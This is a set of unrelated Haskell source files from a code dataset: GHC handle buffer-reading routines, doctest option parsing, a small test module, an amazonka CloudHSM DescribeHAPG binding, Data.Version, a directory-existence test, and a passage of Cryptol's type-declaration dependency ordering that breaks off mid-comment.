  | count < 0  = illegalBufferSize h "hGetBuf" count
  | otherwise =
      wantReadableHandle_ "hGetBuf" h $ \ h_@Handle__{..} -> do
        flushCharReadBuffer h_
        buf <- readIORef haByteBuffer
        if isEmptyBuffer buf
          then bufReadEmpty    h_ buf (castPtr ptr) 0 count
          else bufReadNonEmpty h_ buf (castPtr ptr) 0 count
-- small reads go through the buffer, large reads are satisfied by
-- taking data first from the buffer and then direct from the file
-- descriptor.

-- | Drain as much as possible from a non-empty byte buffer into @ptr@;
-- if more is still wanted afterwards, fall through to 'bufReadEmpty'.
bufReadNonEmpty :: Handle__ -> Buffer Word8 -> Ptr Word8 -> Int -> Int -> IO Int
bufReadNonEmpty h_@Handle__{..}
                buf@Buffer{ bufRaw=raw, bufR=w, bufL=r, bufSize=sz }
                ptr !so_far !count
 = do
        let avail = w - r
        if (count < avail)
           -- request fits inside the buffered data: copy and advance bufL
           then do
                copyFromRawBuffer ptr raw r count
                writeIORef haByteBuffer buf{ bufL = r + count }
                return (so_far + count)
           -- take everything buffered, then continue with an empty buffer
           else do
                copyFromRawBuffer ptr raw r avail
                let buf' = buf{ bufR=0, bufL=0 }
                writeIORef haByteBuffer buf'
                let remaining = count - avail
                    so_far' = so_far + avail
                    ptr' = ptr `plusPtr` avail
                if remaining == 0
                   then return so_far'
                   else bufReadEmpty h_ buf' ptr' so_far' remaining

-- | Satisfy a read when the byte buffer is empty.  A request larger than
-- the buffer reads straight from the FD in a loop; otherwise refill the
-- buffer once and retry via 'bufReadNonEmpty'.
-- (NOTE: the @r@ bound from @fillReadBuffer@ shadows the buffer's @bufL@
-- binding above; both shadowings are intentional here.)
bufReadEmpty :: Handle__ -> Buffer Word8 -> Ptr Word8 -> Int -> Int -> IO Int
bufReadEmpty h_@Handle__{..}
             buf@Buffer{ bufRaw=raw, bufR=w, bufL=r, bufSize=sz }
             ptr so_far count
 | count > sz, Just fd <- cast haDevice = loop fd 0 count
 | otherwise = do
     (r,buf') <- Buffered.fillReadBuffer haDevice buf
     if r == 0
        then return so_far
        else do writeIORef haByteBuffer buf'
                bufReadNonEmpty h_ buf' ptr so_far count
 where
  -- read directly from the FD until done or EOF (read returning 0)
  loop :: FD -> Int -> Int -> IO Int
  loop fd off bytes | bytes <= 0 = return (so_far + off)
  loop fd off bytes = do
    r <- RawIO.read (fd::FD) (ptr `plusPtr` off) bytes
    if r == 0
       then return (so_far + off)
       else loop fd (off + r) (bytes - r)
-- ---------------------------------------------------------------------------
-- hGetBufSome
-- | 'hGetBufSome' @hdl buf count@ reads data from the handle @hdl@
-- into the buffer @buf@. If there is any data available to read,
-- then 'hGetBufSome' returns it immediately; it only blocks if there
-- is no data to be read.
--
-- It returns the number of bytes actually read. This may be zero if
-- EOF was reached before any data was read (or if @count@ is zero).
--
-- 'hGetBufSome' never raises an EOF exception, instead it returns a value
-- smaller than @count@.
--
-- If the handle is a pipe or socket, and the writing end
-- is closed, 'hGetBufSome' will behave as if EOF was reached.
--
-- 'hGetBufSome' ignores the prevailing 'TextEncoding' and 'NewlineMode'
-- on the 'Handle', and reads bytes directly.
-- | Return whatever data is available now, blocking only when nothing is.
hGetBufSome :: Handle -> Ptr a -> Int -> IO Int
hGetBufSome h ptr count
  | count == 0 = return 0
  | count < 0  = illegalBufferSize h "hGetBufSome" count
  | otherwise =
      wantReadableHandle_ "hGetBufSome" h $ \ h_@Handle__{..} -> do
        flushCharReadBuffer h_
        buf@Buffer{ bufSize=sz } <- readIORef haByteBuffer
        if isEmptyBuffer buf
           then case count > sz of  -- large read? optimize it with a little special case:
                  True | Just fd <- haFD h_ -> do RawIO.read fd (castPtr ptr) count
                  _ -> do (r,buf') <- Buffered.fillReadBuffer haDevice buf
                          if r == 0
                             then return 0
                             else do writeIORef haByteBuffer buf'
                                     bufReadNBNonEmpty h_ buf' (castPtr ptr) 0 (min r count)
                                     -- new count is (min r count), so
                                     -- that bufReadNBNonEmpty will not
                                     -- issue another read.
           else
             -- data is already buffered: hand back at most what we hold
             let count' = min count (bufferElems buf)
             in bufReadNBNonEmpty h_ buf (castPtr ptr) 0 count'
-- Recover the raw 'FD' backing a handle, when its device really is an FD.
haFD :: Handle__ -> Maybe FD
haFD Handle__{haDevice = dev} = cast dev
-- | 'hGetBufNonBlocking' @hdl buf count@ reads data from the handle @hdl@
-- into the buffer @buf@ until either EOF is reached, or
-- @count@ 8-bit bytes have been read, or there is no more data available
-- to read immediately.
--
-- 'hGetBufNonBlocking' is identical to 'hGetBuf', except that it will
-- never block waiting for data to become available, instead it returns
-- only whatever data is available. To wait for data to arrive before
-- calling 'hGetBufNonBlocking', use 'hWaitForInput'.
--
-- If the handle is a pipe or socket, and the writing end
-- is closed, 'hGetBufNonBlocking' will behave as if EOF was reached.
--
-- 'hGetBufNonBlocking' ignores the prevailing 'TextEncoding' and
-- 'NewlineMode' on the 'Handle', and reads bytes directly.
--
-- NOTE: on Windows, this function does not work correctly; it
-- behaves identically to 'hGetBuf'.
-- | Read up to @count@ bytes without ever blocking; returns what was
-- immediately available (possibly 0).
--
-- Fix: the original destructured the buffer's @bufRaw@/@bufR@/@bufL@/
-- @bufSize@ fields without using any of them; the bindings are dropped.
hGetBufNonBlocking :: Handle -> Ptr a -> Int -> IO Int
hGetBufNonBlocking h ptr count
  | count == 0 = return 0
  | count < 0  = illegalBufferSize h "hGetBufNonBlocking" count
  | otherwise =
      wantReadableHandle_ "hGetBufNonBlocking" h $ \ h_@Handle__{..} -> do
        flushCharReadBuffer h_
        buf <- readIORef haByteBuffer
        if isEmptyBuffer buf
          then bufReadNBEmpty    h_ buf (castPtr ptr) 0 count
          else bufReadNBNonEmpty h_ buf (castPtr ptr) 0 count
-- | Non-blocking read with an empty byte buffer.  Oversized requests go
-- straight to the FD via 'RawIO.readNonBlocking'; otherwise try one
-- non-blocking refill ('fillReadBuffer0') and copy from the result.
bufReadNBEmpty :: Handle__ -> Buffer Word8 -> Ptr Word8 -> Int -> Int -> IO Int
bufReadNBEmpty h_@Handle__{..}
               buf@Buffer{ bufRaw=raw, bufR=w, bufL=r, bufSize=sz }
               ptr so_far count
  | count > sz,
    Just fd <- cast haDevice = do
       m <- RawIO.readNonBlocking (fd::FD) ptr count
       case m of
         Nothing -> return so_far
         Just n  -> return (so_far + n)
  | otherwise = do
     -- re-read the buffer ref (deliberately shadows the parameter)
     buf <- readIORef haByteBuffer
     (r,buf') <- Buffered.fillReadBuffer0 haDevice buf
     case r of
       Nothing -> return so_far
       Just 0  -> return so_far
       Just r  -> do
         writeIORef haByteBuffer buf'
         bufReadNBNonEmpty h_ buf' ptr so_far (min count r)
         -- NOTE: new count is min count r
         -- so we will just copy the contents of the
         -- buffer in the recursive call, and not
         -- loop again.

-- | Non-blocking read from a non-empty buffer: copy what fits, and if the
-- request is not yet satisfied continue via 'bufReadNBEmpty'.
bufReadNBNonEmpty :: Handle__ -> Buffer Word8 -> Ptr Word8 -> Int -> Int -> IO Int
bufReadNBNonEmpty h_@Handle__{..}
                  buf@Buffer{ bufRaw=raw, bufR=w, bufL=r, bufSize=sz }
                  ptr so_far count
  = do
       let avail = w - r
       if (count < avail)
          then do
               copyFromRawBuffer ptr raw r count
               writeIORef haByteBuffer buf{ bufL = r + count }
               return (so_far + count)
          else do
               copyFromRawBuffer ptr raw r avail
               let buf' = buf{ bufR=0, bufL=0 }
               writeIORef haByteBuffer buf'
               let remaining = count - avail
                   so_far' = so_far + avail
                   ptr' = ptr `plusPtr` avail
               if remaining == 0
                  then return so_far'
                  else bufReadNBEmpty h_ buf' ptr' so_far' remaining
-- ---------------------------------------------------------------------------
-- memcpy wrappers
-- Copy @bytes@ bytes from @ptr@ into @raw@ at offset @off@.
copyToRawBuffer :: RawBuffer e -> Int -> Ptr e -> Int -> IO ()
copyToRawBuffer raw off ptr bytes = withRawBuffer raw copyIn
  where
    -- memcpy returns the destination pointer; we have no use for it.
    copyIn praw = memcpy (praw `plusPtr` off) ptr (fromIntegral bytes) >> return ()
-- Copy @bytes@ bytes out of @raw@ at offset @off@ into @ptr@.
copyFromRawBuffer :: Ptr e -> RawBuffer e -> Int -> Int -> IO ()
copyFromRawBuffer ptr raw off bytes = withRawBuffer raw copyOut
  where
    -- memcpy returns the destination pointer; we have no use for it.
    copyOut praw = memcpy ptr (praw `plusPtr` off) (fromIntegral bytes) >> return ()
-- Raw C @memcpy@: copies the given number of bytes between (assumed
-- non-overlapping) regions.  Callers above discard the returned
-- destination pointer.
foreign import ccall unsafe "memcpy"
   memcpy :: Ptr a -> Ptr a -> CSize -> IO (Ptr ())
-----------------------------------------------------------------------------
-- Internal Utils
-- Throw an 'InvalidArgument' IOError naming the offending function and size.
illegalBufferSize :: Handle -> String -> Int -> IO a
illegalBufferSize handle fn sz = ioException ioe
  where
    ioe = IOError (Just handle) InvalidArgument fn msg Nothing Nothing
    msg = "illegal buffer size " ++ showsPrec 9 sz []
| phischu/fragnix | builtins/base/GHC.IO.Handle.Text.hs | bsd-3-clause | 37,745 | 0 | 25 | 11,805 | 7,586 | 3,871 | 3,715 | 560 | 7 |
module Options (
Option(..)
, getOptions
, ghcOptions
, haddockOptions
) where
import Control.Monad (when)
import System.Environment (getArgs)
import System.Exit
import System.Console.GetOpt
import qualified Documentation.Haddock as Haddock
-- | Command-line flags recognised by doctest.
data Option = Help                -- ^ @--help@: print usage and exit
            | Verbose             -- ^ @-v@ \/ @--verbose@: chatty output, Haddock warnings
            | GhcOption String    -- ^ @--optghc=OPTION@: forwarded verbatim to GHC
            | DumpOnly            -- ^ @--dump-only@: dump extracted test cases (hidden flag)
  deriving (Show, Eq)
-- Flags that appear in the @--help@ usage text.
documentedOptions :: [OptDescr Option]
documentedOptions = [
    Option []    ["help"]    (NoArg Help)                "display this help and exit"
  , Option ['v'] ["verbose"] (NoArg Verbose)             "explain what is being done, enable Haddock warnings"
  , Option []    ["optghc"]  (ReqArg GhcOption "OPTION") "option to be forwarded to GHC"
  ]

-- Flags that are accepted but deliberately left out of the usage text.
undocumentedOptions :: [OptDescr Option]
undocumentedOptions = [
    Option [] ["dump-only"] (NoArg DumpOnly) "dump extracted test cases to stdout"
  ]
-- | Parse the process's command line into (flags, module names).
-- Exits the process on @--help@, on a parse error, or when no modules
-- were given.
getOptions :: IO ([Option], [String])
getOptions = do
  args <- getArgs
  let (options, modules, errors) = getOpt Permute (documentedOptions ++ undocumentedOptions) args
  when (Help `elem` options)
    (printAndExit usage)
  -- 'head errors' is safe: guarded by the non-null check just above
  when ((not . null) errors)
    (tryHelp $ head errors)
  when (null modules)
    (tryHelp "no input files\n")
  return (options, modules)
  where
    -- print a message and terminate successfully (never returns)
    printAndExit :: String -> IO a
    printAndExit s = putStr s >> exitWith ExitSuccess

    usage = usageInfo "Usage: doctest [OPTION]... MODULE...\n" documentedOptions

    -- report an error plus a pointer at --help, then exit
    tryHelp message = printAndExit $ "doctest: " ++ message
        ++ "Try `doctest --help' for more information.\n"
-- | Extract all ghc options from given list of options.
--
-- Example:
--
-- >>> ghcOptions [Help, GhcOption "-foo", Verbose, GhcOption "-bar"]
-- ["-foo","-bar"]
ghcOptions :: [Option] -> [String]
ghcOptions = concatMap extract
  where
    -- keep only the payload of GhcOption flags; drop every other flag
    extract (GhcOption option) = [option]
    extract _                  = []
-- | Format given list of options for Haddock: pick a verbosity level
-- (3 when 'Verbose', otherwise 0 with warnings suppressed) and forward
-- every collected GHC option.
haddockOptions :: [Option] -> [Haddock.Flag]
haddockOptions opts = verbosity ++ ghcOpts
  where
    verbosity = if (Verbose `elem` opts) then [Haddock.Flag_Verbosity "3"] else [Haddock.Flag_Verbosity "0", Haddock.Flag_NoWarnings]
    ghcOpts = map Haddock.Flag_OptGhc $ ghcOptions opts
| beni55/doctest-haskell | src/Options.hs | mit | 2,188 | 0 | 12 | 504 | 565 | 309 | 256 | 45 | 2 |
module TestModule (
DataName (..),
TypeSynonymBool,
ClassName,
functionBool
) where
import Prelude
-- | Pair of a polymorphic payload and a 'Bool'.
data DataName dataVariable = DataName dataVariable Bool deriving (Show, Eq)

-- | Plain alias for 'Bool'; adds no type safety.
type TypeSynonymBool = Bool

-- | Minimal one-method class (exercises class export).
class ClassName classVariable where
  method :: classVariable

-- | 'Bool' instance: 'method' is simply 'True'.
instance ClassName Bool where
  method = True
-- Ignores its argument and always yields 'True'.
functionBool :: a -> Bool
functionBool = const True
-- Ignores its argument and always yields zero.
functionInt :: a -> Int
functionInt = const 0
-- The identity function, restated.
functionId :: a -> a
functionId x = x
| adarqui/ToyBox | haskell/bmillwood/haskell-src-meta/examples/TestModule.hs | gpl-3.0 | 465 | 0 | 6 | 97 | 132 | 75 | 57 | 18 | 1 |
{-# LANGUAGE DeriveDataTypeable #-}
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE RecordWildCards #-}
{-# LANGUAGE TypeFamilies #-}
{-# OPTIONS_GHC -fno-warn-unused-imports #-}
{-# OPTIONS_GHC -fno-warn-unused-binds #-}
{-# OPTIONS_GHC -fno-warn-unused-matches #-}
-- Derived from AWS service descriptions, licensed under Apache 2.0.
-- |
-- Module : Network.AWS.CloudHSM.DescribeHAPG
-- Copyright : (c) 2013-2015 Brendan Hay
-- License : Mozilla Public License, v. 2.0.
-- Maintainer : Brendan Hay <brendan.g.hay@gmail.com>
-- Stability : auto-generated
-- Portability : non-portable (GHC extensions)
--
-- Retrieves information about a high-availability partition group.
--
-- /See:/ <http://docs.aws.amazon.com/cloudhsm/latest/dg/API_DescribeHAPG.html AWS API Reference> for DescribeHAPG.
module Network.AWS.CloudHSM.DescribeHAPG
(
-- * Creating a Request
describeHAPG
, DescribeHAPG
-- * Request Lenses
, dhapgHAPGARN
-- * Destructuring the Response
, describeHAPGResponse
, DescribeHAPGResponse
-- * Response Lenses
, dhapgrsState
, dhapgrsLastModifiedTimestamp
, dhapgrsHSMsPendingRegistration
, dhapgrsHSMsPendingDeletion
, dhapgrsHAPGSerial
, dhapgrsHSMsLastActionFailed
, dhapgrsPartitionSerialList
, dhapgrsHAPGARN
, dhapgrsLabel
, dhapgrsResponseStatus
) where
import Network.AWS.CloudHSM.Types
import Network.AWS.CloudHSM.Types.Product
import Network.AWS.Prelude
import Network.AWS.Request
import Network.AWS.Response
-- | Contains the inputs for the DescribeHapg action.
--
-- /See:/ 'describeHAPG' smart constructor.
newtype DescribeHAPG = DescribeHAPG'
    { _dhapgHAPGARN :: Text -- ^ ARN of the partition group to query (serialised as @HapgArn@)
    } deriving (Eq,Read,Show,Data,Typeable,Generic)
-- | Creates a value of 'DescribeHAPG' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'dhapgHAPGARN'
describeHAPG
    :: Text -- ^ 'dhapgHAPGARN'
    -> DescribeHAPG
-- The request has exactly one field, so wrap the ARN directly.
describeHAPG arn = DescribeHAPG' { _dhapgHAPGARN = arn }
-- | The ARN of the high-availability partition group to describe.
-- (Getter\/setter pair over the request's single field.)
dhapgHAPGARN :: Lens' DescribeHAPG Text
dhapgHAPGARN = lens _dhapgHAPGARN (\ s a -> s{_dhapgHAPGARN = a});
-- Wire the request through the CloudHSM JSON protocol and decode the
-- reply field-by-field; @.!\@ mempty@ defaults absent list fields to [].
-- (The header argument @h@ of the continuation is unused.)
instance AWSRequest DescribeHAPG where
        type Rs DescribeHAPG = DescribeHAPGResponse
        request = postJSON cloudHSM
        response
          = receiveJSON
              (\ s h x ->
                 DescribeHAPGResponse' <$>
                   (x .?> "State") <*> (x .?> "LastModifiedTimestamp")
                     <*> (x .?> "HsmsPendingRegistration" .!@ mempty)
                     <*> (x .?> "HsmsPendingDeletion" .!@ mempty)
                     <*> (x .?> "HapgSerial")
                     <*> (x .?> "HsmsLastActionFailed" .!@ mempty)
                     <*> (x .?> "PartitionSerialList" .!@ mempty)
                     <*> (x .?> "HapgArn")
                     <*> (x .?> "Label")
                     <*> (pure (fromEnum s)))
-- Required headers: X-Amz-Target selects the CloudHSM operation.
instance ToHeaders DescribeHAPG where
        toHeaders
          = const
              (mconcat
                 ["X-Amz-Target" =#
                    ("CloudHsmFrontendService.DescribeHapg" ::
                       ByteString),
                  "Content-Type" =#
                    ("application/x-amz-json-1.1" :: ByteString)])

-- Request body: a one-key JSON object carrying the ARN.
instance ToJSON DescribeHAPG where
        toJSON DescribeHAPG'{..}
          = object
              (catMaybes [Just ("HapgArn" .= _dhapgHAPGARN)])

-- All CloudHSM calls POST to the service root.
instance ToPath DescribeHAPG where
        toPath = const "/"

-- No query-string parameters are used.
instance ToQuery DescribeHAPG where
        toQuery = const mempty
-- | Contains the output of the DescribeHapg action.
--
-- /See:/ 'describeHAPGResponse' smart constructor.
data DescribeHAPGResponse = DescribeHAPGResponse'
    { _dhapgrsState                   :: !(Maybe CloudHSMObjectState) -- ^ group state
    , _dhapgrsLastModifiedTimestamp   :: !(Maybe Text)   -- ^ last modification time
    , _dhapgrsHSMsPendingRegistration :: !(Maybe [Text]) -- ^ @HsmsPendingRegistration@ field
    , _dhapgrsHSMsPendingDeletion     :: !(Maybe [Text]) -- ^ @HsmsPendingDeletion@ field
    , _dhapgrsHAPGSerial              :: !(Maybe Text)   -- ^ group serial number
    , _dhapgrsHSMsLastActionFailed    :: !(Maybe [Text]) -- ^ @HsmsLastActionFailed@ field
    , _dhapgrsPartitionSerialList     :: !(Maybe [Text]) -- ^ member partition serials
    , _dhapgrsHAPGARN                 :: !(Maybe Text)   -- ^ group ARN
    , _dhapgrsLabel                   :: !(Maybe Text)   -- ^ group label
    , _dhapgrsResponseStatus          :: !Int            -- ^ HTTP status code
    } deriving (Eq,Read,Show,Data,Typeable,Generic)
-- | Creates a value of 'DescribeHAPGResponse' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'dhapgrsState'
--
-- * 'dhapgrsLastModifiedTimestamp'
--
-- * 'dhapgrsHSMsPendingRegistration'
--
-- * 'dhapgrsHSMsPendingDeletion'
--
-- * 'dhapgrsHAPGSerial'
--
-- * 'dhapgrsHSMsLastActionFailed'
--
-- * 'dhapgrsPartitionSerialList'
--
-- * 'dhapgrsHAPGARN'
--
-- * 'dhapgrsLabel'
--
-- * 'dhapgrsResponseStatus'
describeHAPGResponse
    :: Int -- ^ 'dhapgrsResponseStatus'
    -> DescribeHAPGResponse
-- Every optional field starts out 'Nothing'; only the status is required.
describeHAPGResponse pResponseStatus_ =
    DescribeHAPGResponse'
    { _dhapgrsState = Nothing
    , _dhapgrsLastModifiedTimestamp = Nothing
    , _dhapgrsHSMsPendingRegistration = Nothing
    , _dhapgrsHSMsPendingDeletion = Nothing
    , _dhapgrsHAPGSerial = Nothing
    , _dhapgrsHSMsLastActionFailed = Nothing
    , _dhapgrsPartitionSerialList = Nothing
    , _dhapgrsHAPGARN = Nothing
    , _dhapgrsLabel = Nothing
    , _dhapgrsResponseStatus = pResponseStatus_
    }
-- | The state of the high-availability partition group.
dhapgrsState :: Lens' DescribeHAPGResponse (Maybe CloudHSMObjectState)
dhapgrsState = lens _dhapgrsState (\ s a -> s{_dhapgrsState = a});

-- | The date and time the high-availability partition group was last
-- modified.
dhapgrsLastModifiedTimestamp :: Lens' DescribeHAPGResponse (Maybe Text)
dhapgrsLastModifiedTimestamp = lens _dhapgrsLastModifiedTimestamp (\ s a -> s{_dhapgrsLastModifiedTimestamp = a});

-- | The @HsmsPendingRegistration@ response field (viewed as a plain list).
dhapgrsHSMsPendingRegistration :: Lens' DescribeHAPGResponse [Text]
dhapgrsHSMsPendingRegistration = lens _dhapgrsHSMsPendingRegistration (\ s a -> s{_dhapgrsHSMsPendingRegistration = a}) . _Default . _Coerce;

-- | The @HsmsPendingDeletion@ response field (viewed as a plain list).
dhapgrsHSMsPendingDeletion :: Lens' DescribeHAPGResponse [Text]
dhapgrsHSMsPendingDeletion = lens _dhapgrsHSMsPendingDeletion (\ s a -> s{_dhapgrsHSMsPendingDeletion = a}) . _Default . _Coerce;

-- | The serial number of the high-availability partition group.
dhapgrsHAPGSerial :: Lens' DescribeHAPGResponse (Maybe Text)
dhapgrsHAPGSerial = lens _dhapgrsHAPGSerial (\ s a -> s{_dhapgrsHAPGSerial = a});

-- | The @HsmsLastActionFailed@ response field (viewed as a plain list).
dhapgrsHSMsLastActionFailed :: Lens' DescribeHAPGResponse [Text]
dhapgrsHSMsLastActionFailed = lens _dhapgrsHSMsLastActionFailed (\ s a -> s{_dhapgrsHSMsLastActionFailed = a}) . _Default . _Coerce;

-- | The list of partition serial numbers that belong to the
-- high-availability partition group.
dhapgrsPartitionSerialList :: Lens' DescribeHAPGResponse [Text]
dhapgrsPartitionSerialList = lens _dhapgrsPartitionSerialList (\ s a -> s{_dhapgrsPartitionSerialList = a}) . _Default . _Coerce;

-- | The ARN of the high-availability partition group.
dhapgrsHAPGARN :: Lens' DescribeHAPGResponse (Maybe Text)
dhapgrsHAPGARN = lens _dhapgrsHAPGARN (\ s a -> s{_dhapgrsHAPGARN = a});

-- | The label for the high-availability partition group.
dhapgrsLabel :: Lens' DescribeHAPGResponse (Maybe Text)
dhapgrsLabel = lens _dhapgrsLabel (\ s a -> s{_dhapgrsLabel = a});

-- | The response status code.
dhapgrsResponseStatus :: Lens' DescribeHAPGResponse Int
dhapgrsResponseStatus = lens _dhapgrsResponseStatus (\ s a -> s{_dhapgrsResponseStatus = a});
| fmapfmapfmap/amazonka | amazonka-cloudhsm/gen/Network/AWS/CloudHSM/DescribeHAPG.hs | mpl-2.0 | 7,772 | 0 | 20 | 1,677 | 1,280 | 754 | 526 | 141 | 1 |
-----------------------------------------------------------------------------
-- |
-- Module : Data.Version
-- Copyright : (c) The University of Glasgow 2004
-- License : BSD-style (see the file libraries/base/LICENSE)
--
-- Maintainer : libraries@haskell.org
-- Stability : experimental
-- Portability : non-portable (local universal quantification in ReadP)
--
-- A general library for representation and manipulation of versions.
--
-- Versioning schemes are many and varied, so the version
-- representation provided by this library is intended to be a
-- compromise between complete generality, where almost no common
-- functionality could reasonably be provided, and fixing a particular
-- versioning scheme, which would probably be too restrictive.
--
-- So the approach taken here is to provide a representation which
-- subsumes many of the versioning schemes commonly in use, and we
-- provide implementations of 'Eq', 'Ord' and conversion to\/from 'String'
-- which will be appropriate for some applications, but not all.
--
-----------------------------------------------------------------------------
module Data.Version (
-- * The @Version@ type
Version(..),
-- * A concrete representation of @Version@
showVersion, parseVersion,
) where
import Prelude -- necessary to get dependencies right
-- These #ifdefs are necessary because this code might be compiled as
-- part of ghc/lib/compat, and hence might be compiled by an older version
-- of GHC. In which case, we might need to pick up ReadP from
-- Distribution.Compat.ReadP, because the version in
-- Text.ParserCombinators.ReadP doesn't have all the combinators we need.
#if __GLASGOW_HASKELL__ >= 603 || __HUGS__ || __NHC__
import Text.ParserCombinators.ReadP
#else
import Distribution.Compat.ReadP
#endif
#if !__GLASGOW_HASKELL__
import Data.Typeable ( Typeable, TyCon, mkTyCon, mkTyConApp )
#elif __GLASGOW_HASKELL__ < 602
import Data.Dynamic ( Typeable(..), TyCon, mkTyCon, mkAppTy )
#else
import Data.Typeable ( Typeable )
#endif
import Data.List ( intersperse, sort )
import Control.Monad ( liftM )
import Data.Char ( isDigit, isAlphaNum )
{- |
A 'Version' represents the version of a software entity.
An instance of 'Eq' is provided, which implements exact equality
modulo reordering of the tags in the 'versionTags' field.
An instance of 'Ord' is also provided, which gives lexicographic
ordering on the 'versionBranch' fields (i.e. 2.1 > 2.0, 1.2.3 > 1.2.2,
etc.). This is expected to be sufficient for many uses, but note that
you may need to use a more specific ordering for your versioning
scheme. For example, some versioning schemes may include pre-releases
which have tags @\"pre1\"@, @\"pre2\"@, and so on, and these would need to
be taken into account when determining ordering. In some cases, date
ordering may be more appropriate, so the application would have to
look for @date@ tags in the 'versionTags' field and compare those.
The bottom line is, don't always assume that 'compare' and other 'Ord'
operations are the right thing for every 'Version'.
Similarly, concrete representations of versions may differ. One
possible concrete representation is provided (see 'showVersion' and
'parseVersion'), but depending on the application a different concrete
representation may be more appropriate.
-}
data Version =
  Version { versionBranch :: [Int],
                -- ^ The numeric branch for this version.  This reflects the
                -- fact that most software versions are tree-structured; there
                -- is a main trunk which is tagged with versions at various
                -- points (1,2,3...), and the first branch off the trunk after
                -- version 3 is 3.1, the second branch off the trunk after
                -- version 3 is 3.2, and so on.  The tree can be branched
                -- arbitrarily, just by adding more digits.
                --
                -- We represent the branch as a list of 'Int', so
                -- version 3.2.1 becomes [3,2,1].  Lexicographic ordering
                -- (i.e. the default instance of 'Ord' for @[Int]@) gives
                -- the natural ordering of branches.
            versionTags :: [String]  -- really a bag
                -- ^ A version can be tagged with an arbitrary list of strings.
                -- The interpretation of the list of tags is entirely dependent
                -- on the entity that this version applies to.
        }
  deriving (Read,Show
-- Typeable can only be derived on GHC >= 6.2; older/other compilers get a
-- hand-written instance below.
#if __GLASGOW_HASKELL__ >= 602
        ,Typeable
#endif
        )
#if !__GLASGOW_HASKELL__
-- Hand-written 'Typeable' for non-GHC compilers (no deriving support).
versionTc :: TyCon
versionTc = mkTyCon "Version"

instance Typeable Version where
  typeOf _ = mkTyConApp versionTc []
#elif __GLASGOW_HASKELL__ < 602
-- Pre-6.2 GHC spells the type application combinator 'mkAppTy'.
versionTc :: TyCon
versionTc = mkTyCon "Version"

instance Typeable Version where
  typeOf _ = mkAppTy versionTc []
#endif

-- Equality compares the branch exactly and the tags as a bag.
instance Eq Version where
  v1 == v2  =  versionBranch v1 == versionBranch v2
                && sort (versionTags v1) == sort (versionTags v2)
                -- tags may be in any order

-- NOTE: ordering inspects only 'versionBranch', so two versions differing
-- only in tags compare EQ here even though (==) distinguishes them.
instance Ord Version where
  v1 `compare` v2 = versionBranch v1 `compare` versionBranch v2
-- -----------------------------------------------------------------------------
-- A concrete representation of 'Version'
-- | Provides one possible concrete representation for 'Version'. For
-- a version with 'versionBranch' @= [1,2,3]@ and 'versionTags'
-- @= [\"tag1\",\"tag2\"]@, the output will be @1.2.3-tag1-tag2@.
--
showVersion :: Version -> String
showVersion (Version branch tags) = branchText ++ tagsText
  where
    -- branch components joined with dots, e.g. [1,2,3] -> "1.2.3"
    branchText = concat (intersperse "." (map show branch))
    -- each tag prefixed with a dash, e.g. ["a","b"] -> "-a-b"
    tagsText   = concatMap ('-':) tags
-- | A parser for versions in the format produced by 'showVersion'.
--
-- The signature varies with the compiler because the ReadP variants
-- differ in arity across implementations.
#if __GLASGOW_HASKELL__ >= 603 || __HUGS__
parseVersion :: ReadP Version
#elif __NHC__
parseVersion :: ReadPN r Version
#else
parseVersion :: ReadP r Version
#endif
-- 'read' here is safe: munch1 isDigit guarantees a non-empty digit string.
parseVersion = do branch <- sepBy1 (liftM read $ munch1 isDigit) (char '.')
                  tags   <- many (char '-' >> munch1 isAlphaNum)
                  return Version{versionBranch=branch, versionTags=tags}
| alekar/hugs | packages/base/Data/Version.hs | bsd-3-clause | 5,841 | 18 | 11 | 1,039 | 486 | 292 | 194 | 30 | 1 |
{-# LANGUAGE CPP #-}
-- !!! "/" was not recognised as a directory in 6.0.x
import System.Directory
#ifdef mingw32_HOST_OS
-- On Windows, use the C: drive root as a directory that must exist.
root = "C:\\"
#else
-- On POSIX systems, "/" always exists and is a directory.
root = "/"
#endif
-- Regression test: the platform root must be recognised as a directory.
main = print =<< doesDirectoryExist root
| DavidAlphaFox/ghc | libraries/directory/tests/doesDirectoryExist001.hs | bsd-3-clause | 203 | 0 | 6 | 35 | 28 | 17 | 11 | 4 | 1 |
-- |
-- Module : $Header$
-- Copyright : (c) 2013-2014 Galois, Inc.
-- License : BSD3
-- Maintainer : cryptol@galois.com
-- Stability : provisional
-- Portability : portable
{-# LANGUAGE Safe #-}
module Cryptol.TypeCheck.Depends where
import qualified Cryptol.Parser.AST as P
import Cryptol.Parser.Position(Range, Located(..), thing)
import Cryptol.TypeCheck.AST(QName)
import Cryptol.Parser.Names (namesB, namesT)
import Cryptol.TypeCheck.Monad( InferM, recordError, getTVars
, Error(..))
import Data.List(sortBy, groupBy)
import Data.Function(on)
import Data.Maybe(mapMaybe)
import Data.Graph.SCC(stronglyConnComp)
import Data.Graph (SCC(..))
import Data.Map (Map)
import qualified Data.Map as Map
import qualified Data.Set as Set
-- | A type-level declaration: either a type synonym or a newtype.
data TyDecl = TS P.TySyn | NT P.Newtype
-- | Check for duplicate and recursive type synonyms.
-- Returns the type-synonyms in dependency order.
orderTyDecls :: [TyDecl] -> InferM [TyDecl]
orderTyDecls ts =
  do vs <- getTVars
     ds <- combine $ map (toMap vs) ts
     -- build SCCs from (decl, defined names, used names) triples
     let ordered = mkScc [ (t,[x],deps)
                         | (x,(t,deps)) <- Map.toList (Map.map thing ds) ]
     concat `fmap` mapM check ordered

  where
  -- Pair each declaration's name with (decl, free type names minus its
  -- own parameters) — the parameters are not external dependencies.
  toMap vs ty@(NT (P.Newtype x as fs)) =
    ( thing x
    , x { thing = (ty, Set.toList $
                       Set.difference
                         (Set.unions (map (namesT vs . P.value) fs))
                         (Set.fromList (map P.tpQName as))
          )
        }
    )

  toMap vs ty@(TS (P.TySyn x as t)) =
    (thing x
    , x { thing = (ty, Set.toList $
                       Set.difference (namesT vs t)
                                      (Set.fromList (map P.tpQName as)))
        }
    )

  getN (TS (P.TySyn x _ _)) = x
  getN (NT x)               = P.nName x

  check (AcyclicSCC x) = return [x]

  -- We don't support any recursion, for now.
  -- We could support recursion between newtypes, or newtypes and tysysn.
  check (CyclicSCC xs) =
    do recordError (RecursiveTypeDecls (map getN xs))
       return []  -- XXX: This is likely to cause fake errors for missing
                  --  type synonyms. We could avoid this by, for example,
                  -- checking for recursive synonym errors, when looking
                  -- up tycons.
-- | Associate type signatures with bindings and order bindings by
